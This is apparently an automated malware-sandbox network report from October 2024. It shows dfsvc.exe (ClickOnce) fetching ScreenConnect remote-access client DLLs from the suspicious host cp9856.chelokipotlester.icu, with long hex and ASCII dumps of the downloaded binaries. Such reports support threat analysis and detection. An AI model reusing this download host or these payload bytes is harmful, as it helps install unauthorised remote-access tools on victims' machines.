                                                                                                                                                                              Data Ascii: %-&~s%(w+*6((*6(x+(*"(*0K~%-&~s%~%-&~s%(y+(*0vso+_o,+rpo&((o&(,$rp
                                                                                                                                                                              2024-10-29 18:35:01 UTC16384INData Raw: 11 02 8c 82 00 00 1b 0a 06 28 93 01 00 0a 03 02 6f 54 03 00 0a de 07 06 28 95 01 00 0a dc 2a 00 00 01 10 00 00 02 00 0d 00 09 16 00 07 00 00 00 00 2e 02 03 28 8e 00 00 2b 16 fe 01 2a 1b 30 04 00 36 00 00 00 17 00 00 11 04 0a 02 6f c4 00 00 0a 0b 2b 13 07 6f c5 00 00 0a 0c 03 06 25 17 58 0a 08 6f 38 04 00 0a 07 6f 11 00 00 0a 2d e5 de 0a 07 2c 06 07 6f 10 00 00 0a dc 06 04 59 2a 00 00 01 10 00 00 02 00 09 00 1f 28 00 0a 00 00 00 00 13 30 05 00 39 00 00 00 d1 00 00 11 03 14 28 cf 00 00 2b 26 02 6f c2 00 00 0a 0a 06 8d 83 00 00 1b 0b 16 0c 2b 19 07 08 03 02 08 6f c3 00 00 0a 08 6f 39 04 00 0a a4 83 00 00 1b 08 17 58 0c 08 06 32 e3 07 2a 00 00 00 1b 30 02 00 2f 00 00 00 aa 00 00 11 02 2c 2b 02 6f c4 00 00 0a 0a 2b 0e 06 6f c5 00 00 0a 0b 03 07 6f 54 03 00 0a
                                                                                                                                                                              Data Ascii: (oT(*.(+*06o+o%Xo8o-,oY*(09(+&o+oo9X2*0/,+o+ooT
                                                                                                                                                                              2024-10-29 18:35:01 UTC16384INData Raw: 1a 05 00 06 28 7f 01 00 0a 2a 1e 02 28 3b 00 00 0a 2a 1e 02 7b 04 03 00 04 2a 22 02 03 7d 04 03 00 04 2a 1e 02 28 3b 00 00 0a 2a 1e 02 7b 05 03 00 04 2a 22 02 03 7d 05 03 00 04 2a 1e 02 7b 06 03 00 04 2a 22 02 03 7d 06 03 00 04 2a 1e 02 28 c6 07 00 06 2a 1e 02 7b 07 03 00 04 2a 22 02 03 7d 07 03 00 04 2a 1e 02 7b 08 03 00 04 2a 22 02 03 7d 08 03 00 04 2a 1e 02 7b 09 03 00 04 2a 22 02 03 7d 09 03 00 04 2a 1e 02 28 3b 00 00 0a 2a 1e 02 7b 0a 03 00 04 2a 22 02 03 7d 0a 03 00 04 2a 1e 02 28 3b 00 00 0a 2a 1e 02 7b 0b 03 00 04 2a 22 02 03 7d 0b 03 00 04 2a 1e 02 28 3b 00 00 0a 2a 1e 02 7b 13 03 00 04 2a 22 02 03 7d 13 03 00 04 2a 1e 02 7b 14 03 00 04 2a 22 02 03 7d 14 03 00 04 2a 1e 02 7b 15 03 00 04 2a 22 02 03 7d 15 03 00 04 2a 1e 02 7b 16 03 00 04 2a 22 02
                                                                                                                                                                              Data Ascii: (*(;*{*"}*(;*{*"}*{*"}*(*{*"}*{*"}*{*"}*(;*{*"}*(;*{*"}*(;*{*"}*{*"}*{*"}*{*"
                                                                                                                                                                              2024-10-29 18:35:01 UTC16384INData Raw: 01 6f ed 05 00 0a 2a 46 02 72 66 21 00 70 6f ec 05 00 0a a5 e7 00 00 01 2a 4a 02 72 66 21 00 70 03 8c e7 00 00 01 6f ed 05 00 0a 2a 46 02 72 b6 21 00 70 6f ec 05 00 0a a5 e7 00 00 01 2a 4a 02 72 b6 21 00 70 03 8c e7 00 00 01 6f ed 05 00 0a 2a 46 02 72 0e 22 00 70 6f ec 05 00 0a a5 e7 00 00 01 2a 4a 02 72 0e 22 00 70 03 8c e7 00 00 01 6f ed 05 00 0a 2a 46 02 72 50 22 00 70 6f ec 05 00 0a a5 e7 00 00 01 2a 4a 02 72 50 22 00 70 03 8c e7 00 00 01 6f ed 05 00 0a 2a 46 02 72 7e 22 00 70 6f ec 05 00 0a a5 e7 00 00 01 2a 4a 02 72 7e 22 00 70 03 8c e7 00 00 01 6f ed 05 00 0a 2a 46 02 72 ac 22 00 70 6f ec 05 00 0a a5 e7 00 00 01 2a 4a 02 72 ac 22 00 70 03 8c e7 00 00 01 6f ed 05 00 0a 2a 46 02 72 ee 22 00 70 6f ec 05 00 0a a5 e7 00 00 01 2a 4a 02 72 ee 22 00 70 03
                                                                                                                                                                              Data Ascii: o*Frf!po*Jrf!po*Fr!po*Jr!po*Fr"po*Jr"po*FrP"po*JrP"po*Fr~"po*Jr~"po*Fr"po*Jr"po*Fr"po*Jr"p
                                                                                                                                                                              2024-10-29 18:35:01 UTC16384INData Raw: 00 00 00 5f 58 47 06 09 1e 63 20 ff 00 00 00 5f 58 47 1c 5a 58 06 09 1f 10 63 20 ff 00 00 00 5f 58 47 1f 24 5a 58 d2 52 08 17 58 0c 08 05 32 be 14 0b 2a 86 02 1c 8d ba 00 00 01 25 d0 41 04 00 04 28 c1 04 00 0a 7d 34 04 00 04 02 1e 16 03 28 d2 09 00 06 2a 13 30 06 00 8e 00 00 00 7e 01 00 11 02 7b 34 04 00 04 25 0b 2c 05 07 8e 69 2d 05 16 e0 0a 2b 09 07 16 8f ba 00 00 01 e0 0a 16 0c 2b 66 02 0e 05 0e 06 08 05 17 59 fe 01 28 d4 09 00 06 0e 05 0d 03 13 04 16 13 05 2b 3c 09 25 17 58 0d 47 13 06 11 04 25 1a 58 13 04 20 00 00 00 ff 06 11 06 1c 5d 58 47 60 06 11 06 1f 24 5d 1c 5b 58 47 1e 62 60 06 11 06 1f 24 5b 58 47 1f 10 62 60 54 11 05 17 58 13 05 11 05 04 32 bf 08 17 58 0c 03 0e 04 58 10 01 08 05 32 96 14 0b 2a 3a 02 28 c0 09 00 06 02 03 7d 35 04 00 04 2a 00
                                                                                                                                                                              Data Ascii: _XGc _XGZXc _XG$ZXRX2*%A(}4(*0~{4%,i-++fY(+<%XG%X ]XG`$][XGb`$[XGb`TX2XX2*:(}5*
                                                                                                                                                                              2024-10-29 18:35:01 UTC16384INData Raw: 07 45 03 00 00 00 07 00 00 00 47 00 00 00 92 00 00 00 16 0a dd 9d 00 00 00 02 15 7d 7f 08 00 0a 02 02 7b 82 08 00 0a 6f 15 00 00 0a 7d 83 08 00 0a 02 1f fd 7d 7f 08 00 0a 2b 26 02 7b 83 08 00 0a 6f 12 00 00 0a 0c 02 08 7d 84 08 00 0a 02 17 7d 7f 08 00 0a 17 0a de 5d 02 1f fd 7d 7f 08 00 0a 02 7b 83 08 00 0a 6f 11 00 00 0a 2d cd 02 28 81 08 00 0a 02 14 7d 83 08 00 0a 02 7c 85 08 00 0a 28 86 08 00 0a 2c 23 02 02 7c 85 08 00 0a 28 87 08 00 0a 7d 84 08 00 0a 02 18 7d 7f 08 00 0a 17 0a de 12 02 15 7d 7f 08 00 0a 16 0a de 07 02 28 88 08 00 0a dc 06 2a 00 01 10 00 00 04 00 00 00 b6 b6 00 07 00 00 00 00 6e 02 15 7d 7f 08 00 0a 02 7b 83 08 00 0a 2c 0b 02 7b 83 08 00 0a 6f 10 00 00 0a 2a 1e 02 7b 84 08 00 0a 2a 1a 73 4c 01 00 0a 7a 32 02 7b 84 08 00 0a 8c 75 00 00
                                                                                                                                                                              Data Ascii: EG}{o}}+&{o}}]}{o-(}|(,#|(}}}(*n}{,{o*{*sLz2{u
                                                                                                                                                                              2024-10-29 18:35:01 UTC16384INData Raw: 2a 1e 02 28 45 10 00 06 2a 2e 73 48 10 00 06 80 92 07 00 04 2a 1e 02 28 3b 00 00 0a 2a 1e 03 6f 89 04 00 0a 2a 1e 02 28 3b 00 00 0a 2a 5e 03 6f 67 04 00 0a 02 7b 94 07 00 04 6f 67 04 00 0a 28 9e 04 00 0a 2a 7a 02 28 3b 00 00 0a 02 03 7d 96 07 00 04 02 28 2d 07 00 0a 6f 2e 07 00 0a 7d 98 07 00 04 2a 06 2a 00 00 00 13 30 06 00 67 01 00 00 08 00 00 11 02 7b 96 07 00 04 0a 06 45 05 00 00 00 02 00 00 00 8c 00 00 00 d9 00 00 00 0b 01 00 00 3d 01 00 00 16 2a 02 15 7d 96 07 00 04 02 28 19 01 00 0a 6f 8b 04 00 0a 73 83 04 00 0a 7d 99 07 00 04 02 02 7b 99 07 00 04 28 c7 0a 00 06 7d 9a 07 00 04 02 02 7b 9a 07 00 04 2d 2a 1f 1c 28 0a 0a 00 0a 18 8d b9 00 00 01 25 16 02 7b 99 07 00 04 6f 90 04 00 0a a2 25 17 72 ff 07 00 70 a2 28 cf 03 00 06 2b 15 02 7b 99 07 00 04 6f
                                                                                                                                                                              Data Ascii: *(E*.sH*(;*o*(;*^og{og(*z(;}(-o.}**0g{E=*}(os}{(}{-*(%{o%rp(+{o
                                                                                                                                                                              2024-10-29 18:35:01 UTC16384INData Raw: 37 01 00 51 00 af 03 23 09 01 01 00 00 0a 2f 00 00 ae 37 01 00 51 00 af 03 27 09 01 01 00 00 7d 34 00 00 ae 37 01 00 51 00 af 03 2b 09 01 01 00 00 2c 37 00 00 ae 37 01 00 51 00 af 03 2f 09 01 01 00 00 22 39 00 00 ae 37 01 00 51 00 af 03 33 09 01 01 00 00 22 30 00 00 ae 37 01 00 51 00 af 03 37 09 01 01 00 00 4e 37 00 00 ae 37 01 00 51 00 af 03 3b 09 01 01 00 00 44 39 00 00 ae 37 01 00 51 00 af 03 3f 09 01 01 00 00 97 3a 00 00 ae 37 01 00 51 00 af 03 43 09 01 01 00 00 de 3b 00 00 ae 37 01 00 51 00 af 03 47 09 01 01 00 00 a6 34 00 00 ae 37 01 00 51 00 af 03 4b 09 01 01 00 00 40 37 00 00 ae 37 01 00 51 00 af 03 4f 09 01 01 00 00 36 39 00 00 ae 37 01 00 51 00 af 03 53 09 01 01 00 00 89 3a 00 00 ae 37 01 00 51 00 af 03 57 09 01 01 00 00 d0 3b 00 00 ae 37 01 00
                                                                                                                                                                              Data Ascii: 7Q#/7Q'}47Q+,77Q/"97Q3"07Q7N77Q;D97Q?:7QC;7QG47QK@77QO697QS:7QW;7


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              14192.168.2.164973137.221.67.194437692C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-10-29 18:35:03 UTC128OUTGET /Bin/ScreenConnect.Client.dll HTTP/1.1
                                                                                                                                                                              Host: cp9856.chelokipotlester.icu
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              2024-10-29 18:35:03 UTC217INHTTP/1.1 200 OK
                                                                                                                                                                              Cache-Control: private
                                                                                                                                                                              Content-Length: 192512
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Server: ScreenConnect/23.9.10.8817-1147775063 Microsoft-HTTPAPI/2.0
                                                                                                                                                                              Date: Tue, 29 Oct 2024 18:35:03 GMT
                                                                                                                                                                              Connection: close
                                                                                                                                                                              2024-10-29 18:35:03 UTC16167INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 52 ae 42 a5 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 e8 02 00 00 06 00 00 00 00 00 00 8a 06 03 00 00 20 00 00 00 20 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 03 00 00 02 00 00 f3 30 03 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELRB" 0 `0@
                                                                                                                                                                              2024-10-29 18:35:03 UTC16384INData Raw: 0a 26 06 6f 26 00 00 0a 2a 0a 16 2a 2e 02 03 28 f2 02 00 06 16 fe 01 2a 26 0f 00 03 28 f5 02 00 06 2a 0a 16 2a 5e 03 75 76 00 00 02 2c 0d 02 03 a5 76 00 00 02 28 f5 02 00 06 2a 16 2a 0a 17 2a 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 67 00 00 0a 0a 06 72 e9 0f 00 70 6f 68 00 00 0a 26 06 72 37 01 00 70 6f 68 00 00 0a 26 02 06 28 f7 02 00 06 2c 09 06 1f 20 6f 69 00 00 0a 26 06 1f 7d 6f 69 00 00 0a 26 06 6f 26 00 00 0a 2a 0a 16 2a 2e 02 03 28 f9 02 00 06 16 fe 01 2a 26 0f 00 03 28 fc 02 00 06 2a 0a 16 2a 5e 03 75 77 00 00 02 2c 0d 02 03 a5 77 00 00 02 28 fc 02 00 06 2a 16 2a 0a 17 2a 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 67 00 00 0a 0a 06 72 01 10 00 70 6f 68 00 00 0a 26 06 72 37 01 00 70 6f 68 00 00 0a 26 02 06 28 fe 02 00 06 2c 09 06 1f 20 6f 69 00 00
                                                                                                                                                                              Data Ascii: &o&**.(*&(**^uv,v(***0@sgrpoh&r7poh&(, oi&}oi&o&**.(*&(**^uw,w(***0@sgrpoh&r7poh&(, oi
                                                                                                                                                                              2024-10-29 18:35:04 UTC16384INData Raw: 28 03 04 00 06 02 7b f4 00 00 04 03 6f 99 01 00 0a 0a de 0e 26 02 7b f3 00 00 04 28 af 00 00 0a fe 1a 06 2a 00 01 10 00 00 00 00 21 00 16 37 00 0e 16 00 00 01 1b 30 02 00 1b 00 00 00 00 00 00 00 02 7b f4 00 00 04 03 6f cb 01 00 0a de 0c 02 7b f3 00 00 04 28 af 00 00 0a dc 2a 00 01 10 00 00 02 00 00 00 0e 0e 00 0c 00 00 00 00 1b 30 02 00 4d 00 00 00 4b 00 00 11 73 a2 04 00 06 0a 06 02 7d 5e 01 00 04 06 03 7d 5f 01 00 04 06 04 7d 60 01 00 04 02 7b f3 00 00 04 0b 07 28 aa 00 00 0a 02 28 fa 03 00 06 2c 13 06 fe 06 a3 04 00 06 73 dc 00 00 0a 14 28 02 02 00 0a 26 de 07 07 28 af 00 00 0a dc 2a 00 00 00 01 10 00 00 02 00 28 00 1d 45 00 07 00 00 00 00 13 30 02 00 7c 00 00 00 4c 00 00 11 02 7b f6 00 00 04 7e f4 01 00 0a 28 43 00 00 0a 2d 08 02 7b f6 00 00 04 2b 05
                                                                                                                                                                              Data Ascii: ({o&{(*!70{o{(*0MKs}^}_}`{((,s(&(*(E0|L{~(C-{+
                                                                                                                                                                              2024-10-29 18:35:04 UTC16384INData Raw: 00 00 00 91 18 e4 62 c2 1e 03 00 8c 21 00 00 00 00 96 00 9e 3b c6 1e 03 00 24 22 00 00 00 00 96 00 1f 57 d2 1e 05 00 7e 22 00 00 00 00 96 00 d0 5c d9 1e 06 00 9c 22 00 00 00 00 96 00 27 20 e0 1e 07 00 04 23 00 00 00 00 96 00 b8 78 f1 1e 09 00 35 23 00 00 00 00 86 08 03 74 00 1f 0a 00 3d 23 00 00 00 00 86 08 0e 74 05 1f 0a 00 46 23 00 00 00 00 86 08 29 32 0b 1f 0b 00 4e 23 00 00 00 00 86 08 38 32 11 1f 0b 00 57 23 00 00 00 00 86 08 5b 2d a7 04 0c 00 5f 23 00 00 00 00 86 08 72 2d d4 04 0c 00 68 23 00 00 00 00 86 08 64 72 49 0b 0d 00 70 23 00 00 00 00 86 08 77 72 57 0b 0d 00 79 23 00 00 00 00 86 08 99 72 49 0b 0e 00 81 23 00 00 00 00 86 08 ad 72 57 0b 0e 00 8a 23 00 00 00 00 86 08 c6 52 a7 04 0f 00 92 23 00 00 00 00 86 08 d3 52 d4 04 0f 00 9b 23 00 00 00 00
                                                                                                                                                                              Data Ascii: b!;$"W~"\"' #x5#t=#tF#)2N#82W#[-_#r-h#drIp#wrWy#rI#rW#R#R#
                                                                                                                                                                              2024-10-29 18:35:04 UTC16384INData Raw: 00 f6 06 f7 2a 07 04 10 bd 00 00 00 00 86 18 de 62 01 00 09 04 18 bd 00 00 00 00 83 00 d4 02 04 2b 09 04 69 bd 00 00 00 00 83 00 85 04 04 2b 0b 04 86 bd 00 00 00 00 86 18 de 62 01 00 0d 04 8e bd 00 00 00 00 83 00 19 03 41 11 0d 04 9e bd 00 00 00 00 86 18 de 62 01 00 0e 04 a6 bd 00 00 00 00 83 00 e5 02 01 00 0e 04 d0 bd 00 00 00 00 91 18 e4 62 c2 1e 0e 04 dc bd 00 00 00 00 86 18 de 62 01 00 0e 04 e4 bd 00 00 00 00 83 00 8a 01 ce 2a 0e 04 f1 bd 00 00 00 00 86 18 de 62 01 00 0f 04 f9 bd 00 00 00 00 86 18 de 62 01 00 0f 04 01 be 00 00 00 00 83 00 03 07 0c 2b 0f 04 1a be 00 00 00 00 86 18 de 62 01 00 10 04 24 be 00 00 00 00 83 00 7b 04 04 2b 10 04 c1 be 00 00 00 00 c6 09 79 58 34 03 12 04 00 00 00 00 00 00 c6 05 af 0e 13 2b 12 04 c4 be 00 00 00 00 84 18 de 62
                                                                                                                                                                              Data Ascii: *b+i+bAbbb*bb+b${+yX4+b
                                                                                                                                                                              2024-10-29 18:35:04 UTC16384INData Raw: 00 6c 1a 80 2d 6b 00 6c 1a a0 2d 6b 00 6c 1a c0 2d 6b 00 6c 1a e0 2d 6b 00 6c 1a 00 2e 2a 00 47 2d 20 2e 2a 00 47 2d 20 2e 6b 00 6c 1a 40 2e 2a 00 47 2d 40 2e 6b 00 6c 1a 60 2e 6b 00 6c 1a 80 2e 6b 00 6c 1a a0 2e 6b 00 6c 1a c0 2e 6b 00 6c 1a e0 2e 6b 00 6c 1a 00 2f 6b 00 6c 1a 01 2f 6b 00 6c 1a 20 2f 6b 00 6c 1a 21 2f 6b 00 6c 1a 40 2f 2a 00 47 2d 40 2f 6b 00 6c 1a 41 2f 6b 00 6c 1a 60 2f 6b 00 6c 1a 80 2f 6b 00 6c 1a a0 2f 6b 00 6c 1a c0 2f 6b 00 6c 1a e0 2f 6b 00 6c 1a 00 30 6b 00 6c 1a 20 30 6b 00 6c 1a 40 30 6b 00 6c 1a 60 30 6b 00 6c 1a 80 30 6b 00 6c 1a a0 30 6b 00 6c 1a c0 30 6b 00 6c 1a e0 30 6b 00 6c 1a 00 31 6b 00 6c 1a 20 31 6b 00 6c 1a 21 31 83 00 d9 2d 40 31 6b 00 6c 1a 60 31 6b 00 6c 1a 80 31 6b 00 6c 1a a0 31 6b 00 6c 1a c0 31 6b 00 6c 1a
                                                                                                                                                                              Data Ascii: l-kl-kl-kl-kl.*G- .*G- .kl@.*G-@.kl`.kl.kl.kl.kl.kl/kl/kl /kl!/kl@/*G-@/klA/kl`/kl/kl/kl/kl/kl0kl 0kl@0kl`0kl0kl0kl0kl0kl1kl 1kl!1-@1kl`1kl1kl1kl1kl
                                                                                                                                                                              2024-10-29 18:35:04 UTC16384INData Raw: 65 6e 74 69 61 6c 3e 6b 5f 5f 42 61 63 6b 69 6e 67 46 69 65 6c 64 00 3c 53 6f 75 6e 64 4c 65 76 65 6c 3e 6b 5f 5f 42 61 63 6b 69 6e 67 46 69 65 6c 64 00 3c 53 63 72 65 65 6e 51 75 61 6c 69 74 79 4c 65 76 65 6c 3e 6b 5f 5f 42 61 63 6b 69 6e 67 46 69 65 6c 64 00 3c 54 6f 6f 6c 3e 6b 5f 5f 42 61 63 6b 69 6e 67 46 69 65 6c 64 00 3c 57 61 73 53 75 63 63 65 73 73 66 75 6c 3e 6b 5f 5f 42 61 63 6b 69 6e 67 46 69 65 6c 64 00 3c 44 6f 6d 61 69 6e 3e 6b 5f 5f 42 61 63 6b 69 6e 67 46 69 65 6c 64 00 3c 43 72 65 64 65 6e 74 69 61 6c 50 72 6f 76 69 64 65 72 50 72 6f 74 6f 63 6f 6c 56 65 72 73 69 6f 6e 3e 6b 5f 5f 42 61 63 6b 69 6e 67 46 69 65 6c 64 00 3c 43 6c 69 65 6e 74 56 65 72 73 69 6f 6e 3e 6b 5f 5f 42 61 63 6b 69 6e 67 46 69 65 6c 64 00 3c 41 75 74 68 65 6e 74 69
                                                                                                                                                                              Data Ascii: ential>k__BackingField<SoundLevel>k__BackingField<ScreenQualityLevel>k__BackingField<Tool>k__BackingField<WasSuccessful>k__BackingField<Domain>k__BackingField<CredentialProviderProtocolVersion>k__BackingField<ClientVersion>k__BackingField<Authenti
                                                                                                                                                                              2024-10-29 18:35:04 UTC16384INData Raw: 74 68 65 6e 74 69 63 61 74 65 64 4f 70 65 72 61 74 69 6f 6e 00 73 65 74 5f 41 75 74 68 65 6e 74 69 63 61 74 65 64 4f 70 65 72 61 74 69 6f 6e 00 67 65 74 5f 47 75 65 73 74 43 6f 6e 66 69 67 75 72 61 74 69 6f 6e 00 73 65 74 5f 47 75 65 73 74 43 6f 6e 66 69 67 75 72 61 74 69 6f 6e 00 47 65 74 47 75 65 73 74 43 6f 6e 66 69 67 75 72 61 74 69 6f 6e 00 67 75 65 73 74 43 6f 6e 66 69 67 75 72 61 74 69 6f 6e 00 67 65 74 5f 41 63 74 69 6f 6e 00 46 69 6c 65 41 63 74 69 6f 6e 00 67 65 74 5f 43 72 65 64 65 6e 74 69 61 6c 73 41 63 74 69 6f 6e 00 73 65 74 5f 43 72 65 64 65 6e 74 69 61 6c 73 41 63 74 69 6f 6e 00 53 65 63 75 72 69 74 79 41 63 74 69 6f 6e 00 6f 70 5f 53 75 62 74 72 61 63 74 69 6f 6e 00 42 69 74 6d 61 70 53 65 63 74 69 6f 6e 00 53 79 73 74 65 6d 2e 52 65 66
                                                                                                                                                                              Data Ascii: thenticatedOperationset_AuthenticatedOperationget_GuestConfigurationset_GuestConfigurationGetGuestConfigurationguestConfigurationget_ActionFileActionget_CredentialsActionset_CredentialsActionSecurityActionop_SubtractionBitmapSectionSystem.Ref
                                                                                                                                                                              2024-10-29 18:35:04 UTC16384INData Raw: 65 00 74 00 00 17 50 00 6c 00 61 00 6e 00 74 00 72 00 6f 00 6e 00 69 00 63 00 73 00 00 0b 4a 00 61 00 62 00 72 00 61 00 00 15 53 00 6b 00 75 00 6c 00 6c 00 63 00 61 00 6e 00 64 00 79 00 00 15 53 00 65 00 6e 00 6e 00 68 00 65 00 69 00 73 00 65 00 72 00 00 0f 4a 00 61 00 77 00 62 00 6f 00 6e 00 65 00 00 57 52 00 65 00 6e 00 64 00 65 00 72 00 65 00 64 00 20 00 7b 00 30 00 7d 00 20 00 66 00 72 00 61 00 6d 00 65 00 73 00 20 00 61 00 74 00 20 00 73 00 65 00 67 00 6d 00 65 00 6e 00 74 00 20 00 70 00 6f 00 73 00 69 00 74 00 69 00 6f 00 6e 00 20 00 7b 00 31 00 7d 00 00 b3 dc e0 5d fb aa 6d 41 85 16 c3 82 11 51 9c 1a 00 03 20 00 01 04 20 01 01 08 05 20 01 01 11 15 04 20 01 01 0e 04 20 01 01 02 05 20 01 01 11 29 05 20 01 01 11 35 05 20 01 01 11 49 05 20 02 01 05 02
                                                                                                                                                                              Data Ascii: etPlantronicsJabraSkullcandySennheiserJawboneWRendered {0} frames at segment position {1}]mAQ ) 5 I
                                                                                                                                                                              2024-10-29 18:35:04 UTC16384INData Raw: 00 10 74 52 4e 53 00 10 20 30 40 50 60 70 80 90 a0 b0 c0 d0 e0 f0 54 e0 a8 c8 00 00 02 47 49 44 41 54 78 da ed 58 c9 b2 a3 30 0c 94 30 ab 83 a1 ff ff 6b e7 90 37 55 b8 79 11 b2 21 97 19 eb 96 94 e9 2e 59 5b 5b 22 cd 9a 35 6b d6 ec bf b2 41 bf 8b bf 60 fd 2a fe 04 60 aa fd d8 e3 bb 6e c0 de 55 e2 27 cf a9 00 54 5e 92 26 b8 ce cd 00 c6 3a 7c 1f 81 24 60 d3 2a 7c 27 41 0f 60 ae c2 77 12 48 04 76 ad c1 87 33 bf ba 62 17 7e f0 3f 12 c4 f5 14 e7 22 17 34 01 30 62 10 81 98 7f b0 17 b9 f0 c6 d7 8f 04 9a 00 0c 4c b9 95 e2 cb 67 0f c2 ce d5 db 9d 28 af f1 0d 02 19 4e d5 fb 02 5e 85 f8 16 81 2c 5c bd 03 00 2d c3 37 09 64 e3 bc d9 7c 4d f5 80 6f 13 9c aa 77 31 ef 08 47 fb c1 b7 09 4e d5 1b cc 3b fa 0d 9f 09 ba 8b ea dd ad 3c fa 0d 9f 09 52 d2 93 0b f4 7b b1 08 ae fe
                                                                                                                                                                              Data Ascii: tRNS 0@P`pTGIDATxX00k7Uy!.Y[["5kA`*`nU'T^&:|$`*|'A`wHv3b~?"40bLg(N^,\-7d|Mow1GN;<R{


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              15192.168.2.164973337.221.67.194437692C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-10-29 18:35:05 UTC111OUTGET /Bin/ScreenConnect.ClientService.dll HTTP/1.1
                                                                                                                                                                              Host: cp9856.chelokipotlester.icu
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              2024-10-29 18:35:05 UTC216INHTTP/1.1 200 OK
                                                                                                                                                                              Cache-Control: private
                                                                                                                                                                              Content-Length: 61952
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Server: ScreenConnect/23.9.10.8817-1147775063 Microsoft-HTTPAPI/2.0
                                                                                                                                                                              Date: Tue, 29 Oct 2024 18:35:05 GMT
                                                                                                                                                                              Connection: close
                                                                                                                                                                              2024-10-29 18:35:05 UTC16168INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 c1 68 dd f0 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 ea 00 00 00 06 00 00 00 00 00 00 42 08 01 00 00 20 00 00 00 20 01 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 01 00 00 02 00 00 bc 6c 01 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELh" 0B `l@
                                                                                                                                                                              2024-10-29 18:35:05 UTC16384INData Raw: 7b 5d 00 00 04 6f 2c 02 00 0a 28 45 00 00 0a 07 28 c9 00 00 0a 6f 2d 02 00 0a 7e 28 00 00 0a 6f 2e 02 00 0a de 07 06 28 31 00 00 0a dc 2a 00 00 01 10 00 00 02 00 17 00 ab c2 00 07 00 00 00 00 1e 02 28 1d 00 00 0a 2a 62 02 7b 5f 00 00 04 03 6f 2f 02 00 0a 1e 28 57 00 00 2b fe 01 16 fe 01 2a 1e 02 28 1d 00 00 0a 2a 00 00 00 13 30 03 00 25 00 00 00 24 00 00 11 73 a7 00 00 06 0a 06 03 7d 63 00 00 04 02 7b 60 00 00 04 06 fe 06 a8 00 00 06 73 30 02 00 0a 28 66 00 00 2b 2a 00 00 00 13 30 05 00 88 00 00 00 25 00 00 11 03 6f 31 02 00 0a 03 6f 05 02 00 0a 28 32 02 00 0a 2d 38 02 7b 61 00 00 04 03 6f 05 02 00 0a 6f 33 02 00 0a 2d 08 03 6f 05 02 00 0a 2b 23 03 6f 05 02 00 0a 72 6d 07 00 70 03 6f 34 02 00 0a 72 73 07 00 70 28 35 02 00 0a 2b 06 03 6f 34 02 00 0a 28 dd
                                                                                                                                                                              Data Ascii: {]o,(E(o-~(o.(1*(*b{_o/(W+*(*0%$s}c{`s0(f+*0%o1o(2-8{aoo3-o+#ormpo4rsp(5+o4(
                                                                                                                                                                              2024-10-29 18:35:05 UTC16384INData Raw: 3c 3e 39 5f 5f 30 5f 30 00 3c 47 65 74 4c 6f 63 61 6c 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 47 72 6f 75 70 4e 61 6d 65 3e 62 5f 5f 30 5f 30 00 3c 52 75 6e 3e 62 5f 5f 30 5f 30 00 3c 3e 63 5f 5f 44 69 73 70 6c 61 79 43 6c 61 73 73 30 5f 30 00 3c 3e 39 5f 5f 31 31 5f 30 00 3c 47 65 74 4e 65 77 53 65 72 76 69 63 65 4e 61 6d 65 3e 62 5f 5f 31 31 5f 30 00 3c 54 72 79 47 65 74 55 73 65 72 45 78 70 69 72 61 74 69 6f 6e 54 69 6d 65 3e 62 5f 5f 31 31 5f 30 00 3c 3e 63 5f 5f 44 69 73 70 6c 61 79 43 6c 61 73 73 31 31 5f 30 00 3c 54 72 79 55 6e 69 6e 73 74 61 6c 6c 53 65 72 76 69 63 65 3e 62 5f 5f 32 31 5f 30 00 3c 3e 63 5f 5f 44 69 73 70 6c 61 79 43 6c 61 73 73 31 32 5f 30 00 3c 3e 39 5f 5f 32 32 5f 30 00 3c 54 72 79 53 65 6e 64 53 61 73 3e 62 5f 5f 32 32 5f 30
